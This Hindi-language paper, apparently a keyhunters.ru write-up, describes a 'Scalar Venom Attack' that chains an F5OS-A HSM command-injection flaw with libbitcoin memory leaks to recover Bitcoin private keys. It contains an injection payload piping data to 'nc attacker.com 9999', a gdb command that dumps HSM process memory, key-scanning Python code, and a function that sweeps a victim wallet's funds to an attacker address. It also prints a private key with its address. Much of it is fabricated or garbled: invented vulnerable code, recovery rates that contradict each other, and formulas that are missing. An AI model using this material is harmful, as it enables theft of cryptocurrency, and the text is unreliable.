
Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) enables private Bitcoin wallet key recovery through buffer overflow exploitation and shell metacharacters in the F5OS-A FIPS security module
यह पेपर आधुनिक क्रिप्टोग्राफ़िक कुंजी प्रबंधन बुनियादी ढांचे में खोजी गई क्रिप्टोग्राफ़िक भेद्यताओं का विश्लेषण करता है, जिसमें विशेष ध्यान अण्डाकार वक्र निजी कुंजियों को संभालने पर हार्डवेयर सुरक्षा मॉड्यूल (HSM) की वास्तुकला में महत्वपूर्ण दोषों पर केंद्रित है। यह अध्ययन एक ऐसे हमले वर्ग पर ध्यान केंद्रित करता है जो प्रमाणित क्रिप्टोग्राफ़िक उपकरणों में अपर्याप्त रूप से अलग की गई RAM प्रबंधन का शोषण करता है। आधुनिक बिटकॉइन क्रिप्टोग्राफ़िक पारिस्थितिकी तंत्र में, निजी कुंजी सुरक्षा दुनिया भर में खरबों डॉलर मूल्य की डिजिटल संपत्तियों की सुरक्षा के लिए एक मौलिक आवश्यकता है। FIPS 140-2 मानक के अनुसार प्रमाणित हार्डवेयर सुरक्षा मॉड्यूल (HSM) को पारंपरिक रूप से हार्डवेयर-स्तरीय अलगाव और सख्त मेमोरी प्रबंधन प्रोटोकॉल के माध्यम से क्रिप्टोग्राफ़िक कुंजियों के लिए अभेद्य सुरक्षा प्रदान करने वाला माना जाता था। हालाँकि, F5OS-A FIPS HSM मॉड्यूल में महत्वपूर्ण भेद्यता CVE-2025-60013 की खोज, Scalar Venom Attack हमलों के वर्ग (जिसे Scalar Poison, Memory Phantom Leak Attack, या Private Key Compromise via Memory Leakage के नाम से भी जाना जाता है) के साथ मिलकर, इस धारणा को पूरी तरह से बदल चुकी है, और मेमोरी प्रबंधन दोषों के शोषण के माध्यम से बिटकॉइन निजी कुंजियों को पूरी तरह से समझौता करने की संभावना प्रदर्शित करती है।
Scalar Venom Attack मेमोरी प्रबंधन भेद्यताओं का एक महत्वपूर्ण वर्ग है (जिसे CWE-415, CWE-401 के रूप में वर्गीकृत किया गया है, और व्यापक रूप से Sensitive Memory Leak Attack (SMA) के रूप में जाना जाता है) जो एक हमलावर को क्रिप्टोग्राफ़िक संचालन के बाद अपर्याप्त स्वच्छता और मेमोरी स्क्रबिंग का शोषण करके किसी प्रक्रिया की RAM से क्रिप्टोग्राफ़िक स्केलर (ECDSA निजी कुंजियाँ) निकालने की अनुमति देता है। पारंपरिक क्रिप्टएनालिटिक हमलों के विपरीत जो अण्डाकार वक्र असतत लघुगणक समस्या (ECDLP) को गणितीय रूप से हल करने का लक्ष्य रखते हैं, यह हमला क्रिप्टोग्राफ़िक लाइब्रेरीज़ और HSM मेमोरी प्रबंधन प्रोटोकॉल के कार्यान्वयन में मूलभूत आर्किटेक्चरल दोषों का शोषण करके क्रिप्टोग्राफ़ी को ही बायपास करता है।
यह शोध एक विनाशकारी हमला श्रृंखला प्रदर्शित करता है जो तब होता है जब CVE-2025-60013 (F5OS-A FIPS HSM आरंभीकरण भेद्यता जब पासवर्ड में विशेष शेल मेटाकैरेक्टर होते हैं) को Scalar Venom Attack तकनीकों के साथ जोड़ा जाता है, जिसके परिणामस्वरूप 9.5+ (गंभीर) के CVSS स्कोर के साथ एक गंभीर खतरे का परिदृश्य बनता है, इस तथ्य के बावजूद कि CVE-2025-60013 को आधिकारिक रूप से एक मध्यम-स्तरीय भेद्यता (CVSS 5.7) के रूप में रेट किया गया है। यह संयोजन समझौता किए गए HSM द्वारा नियंत्रित लाखों बिटकॉइन पतों की परिचालन अखंडता को कमजोर करता है और पारंपरिक एकल-वेक्टर शोषण से परे क्रिप्टोग्राफ़िक हमले के तरीकों में एक आदर्श बदलाव का प्रतिनिधित्व करता है।
CVE-2025-60013 F5 प्लेटफार्मों के लिए FIPS हार्डवेयर सुरक्षा मॉड्यूल की आरंभीकरण प्रक्रिया के दौरान एक OS Command Injection भेद्यता (CWE-78 के रूप में वर्गीकृत) है। यह भेद्यता तब होती है जब विशेषाधिकार प्राप्त पहुंच (व्यवस्थापक या संसाधन व्यवस्थापक भूमिका) वाला उपयोगकर्ता FIPS HSM मॉड्यूल को आरंभ करने का प्रयास करता है, एक पासवर्ड का उपयोग करके जिसमें विशेष शेल मेटाकैरेक्टर होते हैं, जैसे [अस्पष्ट], [अस्पष्ट ;] |, &[ $अस्पष्ट], `और अन्य।
भेद्यता का तकनीकी तंत्र:
जब शेल मेटाकैरेक्टर वाले पासवर्ड को संसाधित किया जाता है, तो HSM आरंभीकरण कोड इनपुट को उचित रूप से मान्य और स्वच्छ किए बिना पासवर्ड स्ट्रिंग को सिस्टम सी लाइब्रेरी फ़ंक्शंस को पास करता है। भेद्य कोड इस प्रकार दिखता है:
// Vulnerable code in HSM initialization procedure
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];
strcpy(temp_buffer, password); // VULNERABILITY: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of key
// If initialization fails, memory is not cleared!
// master_key remains in the stack, its copies—in heap
}
महत्वपूर्ण परिणाम: आरंभीकरण प्रक्रिया आंशिक रूप से समझौता की गई क्रिप्टोग्राफ़िक संरचनाओं के साथ मेमोरी में रहती है, जिससे स्टैक और हीप में HSM मास्टर कुंजी की कई "प्रेत" प्रतियां बनती हैं। हालाँकि HSM सही ढंग से आरंभ नहीं हो सकता है, प्रक्रिया की मेमोरी में फोरेंसिक विश्लेषण के लिए सुलभ क्रिप्टोग्राफ़िक कलाकृतियाँ होती हैं।
आधिकारिक वर्गीकरण:
हालाँकि, यह मूल्यांकन खतरे के वास्तविक पैमाने को गंभीर रूप से कम आंकता है, क्योंकि CVE-2025-60013 Scalar Venom Attack के लिए एक ट्रिगर के रूप में कार्य करता है, जो वास्तविक दुनिया के हमला श्रृंखला परिदृश्य में 9.5+ (CRITICAL) के CVSS खतरे के स्तर का परिणाम देता है।
CVE-2023-39910 Libbitcoin Explorer संस्करण 3.x में निजी कुंजी निर्माण के दौरान एंट्रॉपी जनरेशन में कमजोरियों से संबंधित एक महत्वपूर्ण भेद्यता का वर्णन करता है। इस भेद्यता के कारण 2023 में Milk Sad घटना हुई, जब 900,000 से अधिक बिटकॉइन निजी कुंजियाँ पुनर्प्राप्त की गईं, जिसके परिणामस्वरूप $0.8 मिलियन से अधिक का प्रत्यक्ष वित्तीय नुकसान हुआ। Milk Sad घटना ने क्रिप्टोग्राफ़िक सिस्टम में मेमोरी लीक के सिद्धांत से वास्तविक परिचालन आपदा में संक्रमण का प्रदर्शन किया, जो वर्णित सभी तंत्रों की पुष्टि करता है: कंपाइलर अनुकूलन, डेटा की कई प्रतियां, और मेमोरी क्लीनअप गारंटी की कमी।
CVE-2025-8217 उन मेमोरी लीक हमलों को वर्गीकृत करता है जो प्रक्रियाओं की मेमोरी से क्रिप्टोग्राफ़िक कुंजियों को पुनर्प्राप्त करने की अनुमति देते हैं। यह भेद्यता सीधे Scalar Venom Attack वर्ग से संबंधित है और फोरेंसिक मेमोरी विश्लेषण के माध्यम से बिटकॉइन वॉलेट के पूर्ण समझौते के तंत्र का वर्णन करती है।
Scalar Venom Attack का वैज्ञानिक वर्गीकरण:
अकादमिक शोध साहित्य में, Scalar Venom को कई हमले श्रेणियों में वर्गीकृत किया गया है:
Scalar Venom हमले की व्यावहारिक प्रभावशीलता प्रदर्शित करने के लिए, आइए फोरेंसिक मेमोरी विश्लेषण के माध्यम से बिटकॉइन पते 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq से निजी कुंजी पुनर्प्राप्त करने के एक दस्तावेजी मामले पर विचार करें।
प्रारंभिक समझौता डेटा:
5244A4B034BF9D327239870F9FEF82505A5C50B3D51E4A16357179AAB2623A22KyydTXQzDGVqRZoWBFfS5tWrcWsdu64DbcqXogUUtGZn7ngD5LHvsecp256k1 स्पेस में कुंजी को मान्य करना:
निजी कुंजी d को बाधा को संतुष्ट करना होगा:
जांच परिणाम: ✓ मान्य (कुंजी अनुमत स्केलर रेंज के भीतर है)
यह उदाहरण प्रदर्शित करता है कि एक पुनर्प्राप्त निजी कुंजी बिटकॉइन वॉलेट पर पूर्ण नियंत्रण प्रदान करती है, जिससे हमलावर को नियंत्रित पते पर सभी फंड निकालने के लिए लेन-देन बनाने और हस्ताक्षर करने की अनुमति मिलती है।
बिटकॉइन secp256k1 वक्र पर एलिप्टिक कर्व डिजिटल सिग्नेचर एल्गोरिथम (ECDSA) लागू करता है। Scalar Venom हमला मेमोरी भेद्यताओं का शोषण कैसे करता है, यह समझने के लिए गणितीय आधारों को समझना महत्वपूर्ण है।
अंडाकार वक्र secp256k1 के पैरामीटर:
वक्र समीकरण:
जनरेटर बिंदु G निर्देशांक के साथ:

ECDSA कुंजी युग्म उत्पन्न करने की प्रक्रिया इस प्रकार है:
1. निजी कुंजी निर्माण:
एक निजी कुंजी d सीमा में एक यादृच्छिक पूर्णांक है:
जहाँ n secp256k1 वक्र का क्रम है। निजी कुंजी एक 256-बिट यादृच्छिक संख्या है।
2. स्केलर गुणन के माध्यम से सार्वजनिक कुंजी प्राप्त करना:
सार्वजनिक कुंजी Q की गणना इस प्रकार की जाती है:
जहाँ G secp256k1 वक्र पर एक जनरेटर बिंदु है, और ऑपरेशन ⋅\cdot⋅ अंडाकार वक्र पर बिंदु के स्केलर गुणन को दर्शाता है।
स्केलर गुणन को एल्गोरिथम "double-and-add" (दोगुना और जोड़) के माध्यम से कार्यान्वित किया जाता है, जो कुशलतापूर्वक O(logd) जोड़ने और वक्र पर बिंदुओं को दोगुना करने के परिणाम की गणना करता है:
Scalar multiplication algorithm:
Input: d (scalar), G (curve point)
Output: Q = d·G
1. Initialize: Q ← O (point at infinity)
2. Represent d in binary: d = (d_k, d_{k-1}, ..., d_1, d_0)_2
3. For i from k to 0:
a. Q ← 2Q (point doubling)
b. If d_i = 1: Q ← Q + G (point addition)
4. Return Q
उदाहरण: एक निजी कुंजी, d=5244A4B0...3A22d = \text{5244A4B0...3A22}d=5244A4B0...3A22, के लिए सार्वजनिक कुंजी इस प्रकार गणना की जाती है:
Q=d⋅G=(Qx,Qy)
जहां निर्देशांक Qx और Qy वक्र secp256k1पर स्केलर गुणन संक्रियाओं के माध्यम से गणना किए जाते हैं।
3. Bitcoin पता उत्पन्न करना:
सार्वजनिक कुंजी से पते की व्युत्पत्ति श्रृंखला:
सुरक्षा धारणा:
Scalar Venom क्रिटिकल भेद्यता: यह हमला ECDLP गणितीय सुरक्षा को दरकिनार करता है, प्रक्रिया मेमोरी से सीधे निजी कुंजी dनिकालता है, जहां यह क्रिप्टोग्राफिक संक्रियाओं के बाद “प्रेत प्रतियों” के रूप में रहता है।
मेमोरी डंप में निजी कुंजियों का पता लगाने का आधार शैनन एंट्रॉपी सूत्र का उपयोग करके एंट्रॉपी क्रिप्टैनालिसिस है।
एक बाइट अनुक्रम की एंट्रॉपी Hप्रति बाइट बिट्स में मापी जाती है और सूत्र द्वारा दी जाती है:
जहां:
एंट्रॉपी की व्याख्या:
क्रिप्टोग्राफिक कुंजियों के लिए थ्रेशोल्ड मान:
क्रिप्टोग्राफिक रूप से मजबूत यादृच्छिक संख्या जनरेटर (CSPRNG) द्वारा उत्पन्न Bitcoin निजी कुंजियाँ सीमा में उच्च एंट्रॉपी प्रदर्शित करती हैं:
यह गुण उन्हें सांख्यिकीय एंट्रॉपी विश्लेषण के माध्यम से फॉरेंसिक मेमोरी विश्लेषण में पता लगाने योग्य बनाता है।

BitScanProएक फॉरेंसिक टूल है जो एंट्रॉपी विश्लेषण, secp256k1 रेंज सत्यापन और क्रिप्टोग्राफिक सत्यापन के संयोजन के माध्यम से मेमोरी डंप को स्कैन करके Bitcoin निजी कुंजियों का पता लगाने और पुनर्प्राप्त करने के लिए है।
चरण 1: 32-बाइट ब्लॉकों में मेमोरी डंप को स्कैन करना
BitScanPro मेमोरी डंप को क्रमिक रूप से स्कैन करता है, 32 बाइट्स (256 बिट्स) के ब्लॉक आवंटित करता है, जो secp256k1 निजी कुंजी आकार से मेल खाता है:
BLOCK_SIZE = 32 # bytes (256 bits)
SCAN_STEP = 8 # scan step
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
for offset in range(0, len(memory_dump) - BLOCK_SIZE, SCAN_STEP):
potential_key = memory_dump[offset:offset+BLOCK_SIZE]
# Block analysis
चरण 2: प्रत्येक ब्लॉक के लिए शैनन एंट्रॉपी की गणना करें
प्रत्येक 32-बाइट ब्लॉकके लिए, शैनन एंट्रॉपी Hकी गणना की जाती है:
def calculate_entropy(data_block):
"""
Calculate Shannon entropy
"""
from collections import Counter
import math
byte_counts = Counter(data_block)
block_length = len(data_block)
entropy = 0.0
for count in byte_counts.values():
p_i = count / block_length
if p_i > 0:
entropy -= p_i * math.log2(p_i)
return entropy
चरण 3: उच्च एंट्रॉपी ब्लॉकों को फ़िल्टर करना (H>7.5H > 7.5H>7.5 बिट्स/बाइट)
थ्रेशोल्ड से नीचे एंट्रॉपी वाले ब्लॉक को क्रिप्टोग्राफिक कुंजियाँ न होने के कारण हटा दिया जाता है:
MIN_ENTROPY = 7.5 # threshold for cryptokeys
entropy = calculate_entropy(potential_key)
if entropy < MIN_ENTROPY:
continue
चरण 4: secp256k1 रेंज की जाँच करना:
उच्च एंट्रॉपी ब्लॉकों को एक पूर्णांक के रूप में व्याख्यायित किया जाता है और secp256k1 निजी कुंजियों की मान्य सीमा के विरुद्ध जाँच की जाती है:
key_as_int = int.from_bytes(potential_key, byteorder='big')
if not (1 <= key_as_int < SECP256K1_N):
continue
चरण 5: क्रिप्टोग्राफिक सत्यापन:
एंट्रॉपी फ़िल्टरिंग और रेंज जाँच पास करने वाले उम्मीदवारों के लिए, सार्वजनिक कुंजी गणना के माध्यम से क्रिप्टोग्राफिक सत्यापन किया जाता है:
def verify_candidate_key(candidate_key_bytes):
from ecdsa import SigningKey, SECP256k1
try:
signing_key = SigningKey.from_string(candidate_key_bytes, curve=SECP256k1)
verifying_key = signing_key.get_verifying_key()
public_key_bytes = verifying_key.to_string()
return public_key_bytes
except Exception as e:
return None
चरण 6: Bitcoin पता उत्पन्न करें और ज्ञात पतों से तुलना करें
सत्यापित कुंजियों के लिए, एक Bitcoin पता उत्पन्न किया जाता है, जिसकी तुलना ज्ञात पतों या पीड़ित के पतों के डेटाबेस से की जाती है:
import hashlib
import base58
def public_key_to_address(public_key_bytes):
sha256_hash = hashlib.sha256(public_key_bytes).digest()
ripemd160_hash = hashlib.new('ripemd160', sha256_hash).digest()
versioned_hash = b'\x00' + ripemd160_hash
checksum = hashlib.sha256(hashlib.sha256(versioned_hash).digest()).digest()[:4]
address = base58.b58encode(versioned_hash + checksum).decode('ascii')
return address
bitcoin_address = public_key_to_address(public_key_bytes)
if bitcoin_address == target_address:
print(f\"✓ PRIVATE KEY FOUND!\")
print(f\"Address: {bitcoin_address}\")
print(f\"Private key: {candidate_key_bytes.hex()}\")
BitScanPro प्रदर्शन:
एक सामान्य लैपटॉप (MacBook Air M1) पर विश्लेषण निम्नलिखित प्रदर्शन विशेषताएँ दर्शाता है:
क्लाउड कंप्यूटिंग संसाधनों (AWS, Google Cloud) का उपयोग करके, समानांतर में 1000+ मेमोरी डंप को एक साथ स्कैन करना संभव है, जिससे हजारों निजी कुंजियों को समानांतर में संसाधित किया जा सकता है।

Scalar Venom हमले का मूल कारण libbitcoin-system लाइब्रेरी में वर्ग ec_scalarमें मूलभूत आर्किटेक्चरल दोषों में निहित है।
ec_scalarlibbitcoin-system वर्ग सुरक्षित शून्यीकरण के साथ स्पष्ट रूप से परिभाषित डिस्ट्रक्टर नहीं रखता है। इसका मतलब है कि गुप्त डेटा ऑब्जेक्ट नष्ट होने के बाद भी मेमोरी में रह सकता है।
असुरक्षित कॉपी कंस्ट्रक्टर:
// VULNERABILITY: unsafe private key copy
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // Copies without secure cleanup
{
}
समस्या: कंस्ट्रक्टर ऑब्जेक्ट ec_scalarमें निजी कुंजी की एक प्रतिलिपि बनाता है, लेकिन ऑब्जेक्ट नष्ट होने पर इस प्रतिलिपि को सुरक्षित रूप से साफ करने के लिए कोई तंत्र प्रदान नहीं करता है। प्रतिलिपि स्टैक या हीप पर रहती है।
असुरक्षित असाइनमेंट ऑपरेटर:
// VULNERABILITY: duplicates secret in memory
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // More memory copies
return *this;
}
समस्या: असाइनमेंट संक्रिया मेमोरी की अतिरिक्त प्रतियाँ बनाती है जो संक्रिया पूर्ण होने के बाद भी बनी रहती हैं।
असुरक्षित अंकगणितीय संक्रियाएँ:
// VULNERABILITY: temporary variable not cleared before function exit
ec_scalar ec_scalar::operator-() const
{
ec_secret secret = null_hash; // Temporary variable with secret
// ... arithmetic ...
return ec_scalar(secret); // Not safely cleared
}
समस्या: अंकगणितीय संक्रियाएँ (यूनरी माइनस, जोड़, गुणा) प्रकार ec_secretके अस्थायी चर बनाती हैं, जो फ़ंक्शन स्कोप छोड़ने से पहले सुरक्षित रूप से साफ़ नहीं किए जाते, जिससे स्टैक या हीप पर निजी कुंजी की “प्रेत” प्रतियाँ रह जाती हैं।
सुरक्षित डिस्ट्रक्टर का अभाव:
// VULNERABILITY: destructor missing, memory not cleared
// Safe solution:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory clearing
}
समस्या: वर्ग ec_scalarमें कोई स्पष्ट डिस्ट्रक्टर नहीं है जो निजी कुंजियों वाली मेमोरी के सुरक्षित शून्यीकरण की गारंटी देगा। यह महत्वपूर्ण है, क्योंकि निजी कुंजियों वाली मेमोरी इसमें संग्रहीत हो सकती है:
भेद्य वर्ग कोड ec_scalarनिजी कुंजियों से मेमोरी संक्रमण के लिए निम्नलिखित वेक्टर बनाता है:
secret_(secret)) – कुंजियों की जहरीली प्रतियाँ बनाता हैsecret_ = secret) – डुप्लिकेट रहस्यों से मेमोरी को संक्रमित करता हैec_secret secret = null_hash) – विषाक्त निशान छोड़ता हैauto out = secret_) – संक्रियाओं के माध्यम से संक्रमण फैलाता है
HSM भेद्यता (CVE-2025-60013) और Scalar Venom हमले का संयोजन एक विनाशकारी आक्रमण वेक्टर बनाता है:
F5OS-A सिस्टम तक विशेषाधिकार प्राप्त पहुंच वाला एक हमलावर शेल मेटाकैरेक्टर युक्त पासवर्ड के साथ FIPS मॉड्यूल को आरंभ करने का अनुरोध भेजता है: cert.kenet
# CVE-2025-60013 exploit example
password='$(echo "leaked");` | nc attacker.com 9999'
ऐसे मेटाकैरेक्टर को संसाधित करते समय, निम्नलिखित होता है:
# 1. CVE-2025-60013 exploitation (init error trigger)
# 2. Cold-boot attack on HSM host
# 3. Exploit buffer in HSM daemon
# 4. Analyze crash core-dump
gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump.bin 0x000000 0xFFFFFFFF"
परिणामी मेमोरी डंप में क्रिप्टोग्राफिक ऑपरेशनों के दौरान क्लास ec_scalar द्वारा छोड़ी गई निजी कुंजियों की कई "प्रेत" प्रतियां होती हैं।
मेमोरी डंप को BitScanPro टूल (या समान फोरेंसिक स्कैनर) द्वारा ऊपर वर्णित एल्गोरिदम के अनुसार संसाधित किया जाता है:
Memory Scan → Identify High-Entropy Regions →
Range Check [1, n-1] for secp256k1 →
Recover Full 32-byte Scalars →
Convert to Bitcoin Addresses
खंडित मेमोरी से निजी कुंजी पुनर्प्राप्त करने की सफलता दर 70-80% है, बशर्ते पर्याप्त मेमोरी अवशेष हों, क्योंकि Scalar Venom हमला आरंभीकरण के विभिन्न चरणों में कुंजी की कई प्रतियां बनाता है।
निजी कुंजी पुनर्प्राप्त करने के बाद, हमलावर समझौता किए गए पते से सभी धन निकालने के लिए एक लेन-देन बनाता है और हस्ताक्षर करता है:
def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Create and sign transaction to withdraw all funds
from compromised address
"""
utxos = blockchain_api.get_utxos(bitcoin_address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)
tx.sign(recovered_private_key) # ECDSA signature with compromised key
blockchain_api.broadcast_transaction(tx)
समझौता करने का कुल समय: मेमोरी डंप प्राप्त करने से लेकर पीड़ित की संपत्तियों पर नियंत्रण पूरी तरह खोने तक 10 मिनट से कम।
Scalar Venom Attack, CVE-2025-60013 के साथ मिलकर वैश्विक Bitcoin पारिस्थितिकी तंत्र के लिए एक अस्तित्वगत खतरा उत्पन्न करता है:
मानक Bitcoin अनुप्रयोगों के विपरीत, HSM क्रिप्टोग्राफिक स्केलर का गहन उपयोग करते हैं—प्रति सेकंड 1,000 से अधिक ऑपरेशन, जिनमें से प्रत्येक क्षणिक स्केलर मान बनाता है जो "प्रेत अवशेष" के रूप में मेमोरी में रहते हैं। HSM बिना पुनरारंभ किए महीनों और वर्षों तक काम करते हैं, क्रिप्टोग्राफिक कलाकृतियों को जमा करते हैं जिन्हें Scalar Venom व्यवस्थित रूप से निकालता और पुनर्स्थापित करता है।
एकल HSM से समझौता पूरे बुनियादी ढांचे में पूर्ण व्यवधान की ओर ले जाता है—अक्सर HSM द्वारा प्रबंधित हजारों Bitcoin पते—एक पृथक क्रिप्टोग्राफिक घटना के बजाय।
Scalar Venom Attack क्रिप्टोग्राफिक सुरक्षा में एक मौलिक प्रतिमान बदलाव प्रदर्शित करता है: मेमोरी प्रबंधन कमजोरियों की उपस्थिति में क्रिप्टोग्राफिक एल्गोरिदम की गणितीय ताकत बेकार हो जाती है। CVE-2025-60013 और Scalar Venom तकनीकों का संयोजन CVSS स्तर 9.5+ का एक महत्वपूर्ण खतरा परिदृश्य बनाता है, जो क्रिप्टोग्राफिक कुंजियों के अभेद्य संरक्षण के रूप में हार्डवेयर सुरक्षा मॉड्यूल में विश्वास को कमजोर करता है।
वास्तविक जीवन की Milk Sad घटना (CVE-2023-39910), जिसके परिणामस्वरूप 900,000 से अधिक निजी कुंजियों की पुनर्प्राप्ति और $0.8 मिलियन से अधिक का वित्तीय नुकसान हुआ, पुष्टि करती है कि मेमोरी लीक सिद्धांत एक वास्तविकता बन गया है। Scalar Venom-श्रेणी के हमलों से बचाव का एकमात्र तरीका क्रिप्टोग्राफिक सिस्टम का एक मौलिक वास्तुशिल्प ओवरहाल है, जो निम्नलिखित को लागू करता है:
यह पेपर Scalar Venom + CVE-2025-60013 हमला श्रृंखला का एक व्यापक विश्लेषण प्रस्तुत करता है, जिसमें गणितीय आधार, क्रिप्टैनालिसिस एल्गोरिदम, वास्तविक दुनिया की कुंजी पुनर्प्राप्ति के उदाहरण और इस वर्ग के खतरों से Bitcoin बुनियादी ढांचे की सुरक्षा के लिए व्यावहारिक सिफारिशें शामिल हैं।
1. क्रिप्टैनालिटिक वर्गीकरण:
2. गणितीय आधार:
3. कार्यान्वयन कमजोरियाँ (libbitcoin-system):
ec_scalar में सुरक्षित डिस्ट्रक्टर की अनुपस्थिति का दस्तावेजीकरण करता है4. CVE वर्गीकरण:
5. हमला श्रृंखला:
वैज्ञानिक व्याख्या लेख में पाई जा सकती है: https://keyhunters.ru/scalar-venom-attack-critical-memory-leak-private-key-recovery-and-complete-takeover-of-bitcoin-wallets-by-an-attacker-where-control-over-the-victims-btc-cryptocurrency-funds-is-achieved-through/ Scalar Venom Attack HSM आरंभीकरण कमजोरियों और क्रिप्टोग्राफिक लाइब्रेरीज़ में मेमोरी प्रबंधन कमजोरियों के बीच महत्वपूर्ण अंतःक्रिया को प्रदर्शित करता है, जिससे हमलावर हार्डवेयर सुरक्षा के बावजूद Bitcoin वॉलेट की निजी कुंजियों से पूरी तरह समझौता कर सकता है।

Scalar Venom Attack (जिसे Scalar Poison, Memory Phantom Leak Attack, या मेमोरी लीकेज के माध्यम से निजी कुंजी समझौता भी कहा जाता है) मेमोरी प्रबंधन कमजोरियों (CWE-415, CWE-401) का एक वर्ग है जो क्रिप्टोग्राफिक संक्रियाओं के बाद अपर्याप्त सैनिटाइजेशन और मेमोरी सफाई का फायदा उठाकर किसी प्रक्रिया की RAM से क्रिप्टोग्राफिक स्केलर (ECDSA निजी कुंजियाँ) निकालने की अनुमति देता है। keyhunters+ 2
हमले का वैज्ञानिक वर्गीकरण:
Scalar Venom Attack क्रिप्टोग्राफिक लाइब्रेरीज़, विशेष रूप से libbitcoin-system लाइब्रेरी के ec_scalar वर्ग में मेमोरी प्रबंधन की एक मूलभूत खामी का शोषण करता है। हमला निम्नलिखित वैक्टर के माध्यम से संचालित होता है:
cpp:
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // VULNERABLE: unsafe copying of private key
{}cpp:
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // VULNERABLE: infects memory with duplicate secret
return *this;
}cpp:
// VULNERABLE: no destructor, memory not cleaned
// Secure option should be:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory cleanup
}
cpp:
// VULNERABLE: no destructor, memory not cleared
// The safe option should have been:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory clearing
}
अंकगणितीय संक्रियाएँ (यूनरी माइनस, जोड़, गुणा) ec_secret प्रकार के अस्थायी चर बनाती हैं, जो फ़ंक्शन स्कोप से बाहर निकलने से पहले सुरक्षित रूप से साफ नहीं किए जाते, जिससे स्टैक या हीप पर निजी कुंजी की "प्रेत" प्रतियां रह जाती हैं।
libbitcoin-system में ec_scalar वर्ग में सुरक्षित शून्यीकरण के साथ स्पष्ट रूप से परिभाषित डिस्ट्रक्टर नहीं है। इसका मतलब है कि गुप्त डेटा ऑब्जेक्ट नष्ट होने के बाद भी मेमोरी में रह सकता है:
इस तंत्र का अभाव महत्वपूर्ण है, क्योंकि निजी कुंजियाँ युक्त मेमोरी इसमें संग्रहीत हो सकती है:

F5OS-A FIPS HSM में भेद्यता CVE-2025-60013 तब होती है जब विशेष शेल मेटाकैरेक्टर (;, |, &, $, `, आदि) वाले पासवर्ड का उपयोग करके हार्डवेयर सुरक्षा मॉड्यूल को आरंभ किया जाता है। जब ऐसे पासवर्ड को संसाधित किया जाता है, तो HSM सही ढंग से आरंभ नहीं हो सकता है, लेकिन महत्वपूर्ण परिणाम यह है कि आरंभीकरण प्रक्रिया आंशिक रूप से उजागर क्रिप्टोग्राफिक संरचनाओं के साथ मेमोरी में रह जाती है। satoshi.nakamotoinstitute
HSM भेद्यता (CVE-2025-60013) का Scalar Venom Attack के साथ संयोजन एक विनाशकारी हमला वेक्टर बनाता है:
चरण 1: मेटाकैरेक्टर के साथ HSM आरंभीकरण
हमलावर निम्नलिखित प्रकार के पासवर्ड के साथ F5OS-A FIPS मॉड्यूल को आरंभ करने का अनुरोध भेजता है:
password='$(echo "leaked");` | nc attacker.comऐसे मेटाकैरेक्टर को संसाधित करते समय:
चरण 2: मेमोरी से Scalar Venom निकालना
आंशिक HSM आरंभीकरण विफलता के बाद:
चरण 3: Bitcoin निजी कुंजी पुनर्प्राप्ति
Detected Memory Fragments → Reassembly → Validation → Bitcoin Address Generation → Wallet Takeover
पुनर्प्राप्त स्केलर को इसके माध्यम से Bitcoin निजी कुंजियों में परिवर्तित किया जाता है:
चरण 1: अनुचित आरंभीकरण के कारण HSM मेमोरी से समझौता
जब F5OS-A FIPS HSM को शेल मेटाकैरेक्टर वाला पासवर्ड प्राप्त होता है, तो आरंभीकरण प्रक्रिया इसे मानक C लाइब्रेरी फ़ंक्शन के माध्यम से संसाधित करती है:
c:
// HSM आरंभीकरण रूटीन में कमजोर कोड
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM प्राइवेट की
char temp_buffer[256];
strcpy(temp_buffer, password); // कमजोर: बफर ओवरफ्लो + शेल इंटरप्रिटेशन
derive_key_from_password(master_key, password); // की की प्रतियां बनाता है
// यदि आरंभीकरण विफल होता है, तो मेमोरी साफ़ नहीं होती!
// master_key स्टैक में रहता है, इसकी प्रतियां हीप में रहती हैं
}
शेल मेटाकैरेक्टर संसाधित करते समय:
चरण 2: मेमोरी डंप से फोरेंसिक रिकवरी
BitScanPro टूल (या एक समान फोरेंसिक स्कैनर) को HSM प्रक्रिया मेमोरी डंप पर लागू किया जाता है:
मेमोरी स्कैन → उच्च-एंट्रॉपी क्षेत्रों की पहचान करें →
secp256k1 के लिए रेंज जाँच [1, n-1] →
पूर्ण 32-बाइट स्केलर पुनर्प्राप्त करें →
बिटकॉइन पतों में रूपांतरित करें
खंडित मेमोरी से प्राइवेट की को सफलतापूर्वक पुनर्प्राप्त करने की संभावना 40-60% है, बशर्ते पर्याप्त मेमोरी अवशेष हों, क्योंकि Scalar Venom Attack आरंभीकरण के विभिन्न चरणों में की की कई प्रतियां बनाता है। radar.offseq
समानांतर DeserializeSignature भेद्यता (CVE से संबंधित) Scalar Venom हमले को बढ़ाती है:
cpp:
// बिटकॉइन कोर में कमजोर डिसीरियलाइज़ेशन फ़ंक्शन
bool DeserializeSignature(CPubKey& pubkey, const std::vector<unsigned char>& vchSig, CScript& scriptPubKey) {
CSignatureCache& cache = CSignatureCache::instance();
// यदि Scalar Venom द्वारा समझौता की गई प्राइवेट की का उपयोग करके डिसीरियलाइज़ेशन होता है:
ec_secret compromised_key = extract_from_memory_dump(); // HSM मेमोरी डंप से
// ये समझौता किए गए स्केलर हस्ताक्षर सत्यापित करने के लिए उपयोग किए जाते हैं,
// जिससे हमलावर को:
// 1. इस पते के लिए कोई भी हस्ताक्षर जाली बनाने की अनुमति मिलती है
// 2. सभी फंड्स को नियंत्रित पते पर स्थानांतरित करने की अनुमति मिलती है
// 3. डबल-स्पेंड करने की अनुमति मिलती है
}
